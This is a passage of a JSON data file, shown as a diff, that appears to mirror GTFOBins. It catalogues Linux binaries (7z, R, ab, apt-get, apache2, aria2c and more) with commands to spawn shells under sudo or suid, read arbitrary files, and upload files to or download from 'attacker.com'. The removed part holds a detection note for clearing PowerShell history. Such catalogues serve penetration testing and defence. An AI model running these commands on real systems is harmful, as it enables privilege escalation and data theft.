commands.","mitre":["T1070.003"],"privilege":"user","detection":[{"type":"Detection","value":"Capture Script Block Logging (4104) for 'Clear-History', 'Remove-Item ...HistorySavePath', '(Get-PSReadlineOption).HistorySavePath', and 'Set-PSReadLineOption -HistorySaveStyle SaveNothing'. Alert when ConsoleHost_history.txt is deleted, emptied, or truncated (file-audit / Sysmon 23 file-delete). Prefer transcript logging and central forwarding, which survive local history deletion."}],"references":["https://attack.mitre.org/techniques/T1070/003/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"],"added":true,"verifyNote":"MS Learn confirms Set-PSReadLineOption -HistorySaveStyle SaveNothing ('Don't use a history file') and HistorySavePath ($($Host.Name)_history.txt, e.g. ConsoleHost_history.txt); Clear-History is a built-in cmdlet; Atomic Red Team T1070.003 documents the technique (also corroborated by Black Hills InfoSec write-up); ATT&CK T1070.003. No change."}] -\ No newline at end of file +[{"id":"gtfo:7z:file-read:0:sudo","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/7z/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:7z:file-read:0:unprivileged","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/7z/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:sudo","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:suid","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:R:shell:0:unprivileged","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/R/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:sudo","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:suid","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aa-exec:shell:0:unprivileged","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:download:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ab:upload:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:sudo","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:suid","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:acr:command:0:unprivileged","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/acr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:agetty:shell:0:suid","toolId":"gtfo:agetty","toolName":"agetty","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"agetty -l /bin/sh -o -p -a root tty","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/agetty/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:sudo","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:suid","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:alpine:file-read:0:unprivileged","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/alpine/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-playbook:shell:0:sudo","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-playbook:shell:0:unprivileged","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-test:shell:0:sudo","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ansible-test:shell:0:unprivileged","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aoss:shell:0:sudo","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aoss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aoss:shell:0:unprivileged","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aoss/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:0:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2:file-read:1:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2ctl:file-read:0:sudo","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apache2ctl:file-read:0:unprivileged","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apport-cli:inherit:0:unprivileged","toolId":"gtfo:apport-cli","toolName":"apport-cli","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apport-cli -f\n1\n2\nv","description":"The terminal interface expects some choices in order to spawn tha pager.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:apt-get:inherit:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:inherit:0:unprivileged","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:0:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:1:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:apt-get:shell:1:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["apt"]},{"id":"gtfo:aptitude:inherit:0:sudo","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aptitude/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aptitude:inherit:0:unprivileged","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aptitude/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:sudo","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:suid","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ar:file-read:0:unprivileged","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arch-nspawn:shell:0:sudo","toolId":"gtfo:arch-nspawn","toolName":"arch-nspawn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir -p ./etc/\ngrep -oP \"^CHROOT_VERSION='\\K[^']+\" /usr/share/devtools/lib/archroot.sh >.arch-chroot\ntouch ./etc/pacman.conf\necho 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf\narch-nspawn .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file 